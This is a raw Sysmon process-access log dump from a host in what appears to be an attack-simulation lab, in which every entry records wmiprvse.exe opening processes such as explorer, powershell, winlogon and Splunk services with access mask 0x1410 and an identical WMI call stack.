15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.912{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 